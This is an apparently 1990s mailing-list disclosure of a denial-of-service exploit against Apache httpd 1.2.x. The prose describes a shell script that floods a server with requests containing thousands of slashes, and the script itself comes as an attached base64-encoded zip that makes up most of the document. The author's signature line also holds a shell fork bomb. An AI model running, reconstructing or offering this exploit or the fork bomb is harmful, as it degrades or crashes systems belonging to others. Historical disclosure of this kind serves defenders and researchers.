--Boundary_(ID_U1gxLMMkLi1p5W02PXQhhw)
Content-type: text/plain; charset=iso-8859-2
Content-transfer-encoding: quoted-printable
[execuse me if it has been discovered before]
Here's a simple exploit for Apache httpd version 1.2.x (tested on =
1.2.4).
When launched, causes incerases of victim's load average and extreme
slowdowns of disk operations. On my i586 Linux annoying slowdown has =
been
experienced immediately (after maybe 5 seconds). After about 4 minutes
work has been turned into real hell (286?).
Attached program ('beck') is a shell script. It works by sending
excessive http requests with thousands of '/'s inside (parsed from file
'beck.dat'). Single request causes just a little longer thinking of
Apache. But when requests are sent from a loop - huh, victim
system becomes slower and slower... At least on my machine, maybe when
Apache is running on a lightspeed workstation this script makes no
difference.
PS. Fast connection should help... All depends on victim's system
performance.
_______________________________________________________________________
Michal Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]
=3D--------- [ echo "while [ -f \$0 ]; do \$0 &;done" >_;. _ ] =
---------=3D
--Boundary_(ID_U1gxLMMkLi1p5W02PXQhhw)
Content-type: application/x-zip-compressed; name=beck.zip
Content-disposition: attachment; filename=beck.zip
Content-transfer-encoding: base64
UEsDBBQAAgAIAGCmnSMQwy97+QEAAKADAAAEABAAYmVja1VYDADzFKg0I/+nNAAAAACFUl1P2zAU
fc+vOHgVbJqStvAydYDGumpCDJAKe1mFwHFuawvXrmynQdN+/JyPfrBNmh8iJTnn3HPO9ZuDfq5M
P+deJgkJaZsH2OfJ+AppiosVF5IwzI6zF3who7iGneOO1kqQBw+Bi2fWkS7KIK0b4VoJGXE/uKbK
PyucasGXoZx/yq33mQ/c/1Qiq3iVrfR5S04SNccMrDdkODsDY3j4iCDJJEAr/v3u4utkhN4AcXRQ
y0dpfcBMSKUL/8A63BaOVzCk4EXhyPvaffsHrjRGmUWXke1RW1G0J4WxWU3zalnqwA2RLT2ENYai
jjUes5PBKwcvKmCQzFWSjG9vbh6/XV5f3p+dDLYhjxkO/gi5B+wdN9QGe4B0jpzEc1bw8Fcnk+n0
djrCXGnC0QZ1hGUZI+eEleaCCigDUTpHJqBQLvu30W6DzT7rUnpDvF0rjt7O2H7kd/XlGAen348R
LHhuXcg29+BeknLQlhfga3J8QfDWGlRKawitljmkWkhyiMCFDD4yk0rWKWZ13rjjmLSoHQbShkLt
5sMAp9siDs/7Ba37poyChxHW9brzypBGNfa08r8WjlZIRSf1tF9612NqwMZ764wOYy+O6mtRxP1X
XIXYSZZlYA1r4/U/E9nWPWvHNpHq4zVFyLB5K6yhnRd2e1XPiCtpvv8GUEsDBBQAAgAIAHmdnSPu
voPlIgAAAPYfAAAIABAAYmVjay5kYXRVWAwAZwSoNGbvpzQAAAAA7cFBEQAABACwvxQaSOEU0D+L
HO62TW8WAAAAAAAAAPBPHFBLAQIVAxQAAgAIAGCmnSMQwy97+QEAAKADAAAEAAwAAAAAAAEAAED/
gQAAAABiZWNrVVgIAPMUqDQj/6c0UEsBAhUDFAACAAgAeZ2dI+6+g+UiAAAA9h8AAAgADAAAAAAA
AQAAQLaBKwIAAGJlY2suZGF0VVgIAGcEqDRm76c0UEsFBgAAAAACAAIAgAAAAIMCAAAAAA==
--Boundary_(ID_U1gxLMMkLi1p5W02PXQhhw)--